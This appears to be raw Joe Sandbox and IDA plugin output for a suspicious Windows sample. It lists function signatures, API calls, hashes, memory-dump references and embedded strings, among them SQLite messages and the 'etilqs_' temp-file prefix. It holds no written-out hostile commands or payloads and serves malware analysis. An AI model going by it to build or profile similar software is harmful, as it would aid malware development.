                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFilefreememset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2507021081-0
                                                                                                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                              APIs
                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4131324427-0
                                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PathTemp$free
                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                              • API String ID: 924794160-1420421710
                                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                              • API String ID: 1775345501-2769808009
                                                                                                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                              APIs
                                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                                              • String ID: General
                                                                                                              • API String ID: 999786162-26480598
                                                                                                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                              • _snwprintf.MSVCRT ref: 0040977D
                                                                                                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                              • String ID: Error$Error %d: %s
                                                                                                              • API String ID: 313946961-1552265934
                                                                                                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                              • API String ID: 0-1953309616
                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                              • API String ID: 3510742995-272990098
                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@$free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2241099983-0
                                                                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                              APIs
                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 4053608372-0
                                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                              APIs
                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                              • String ID:
                                                                                                              • API String ID: 4247780290-0
                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                              APIs
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1471605966-0
                                                                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                              APIs
                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                              • String ID: \StringFileInfo\
                                                                                                              • API String ID: 102104167-2245444037
                                                                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem$PlacementWindow
                                                                                                              • String ID: AE
                                                                                                              • API String ID: 3548547718-685266089
                                                                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
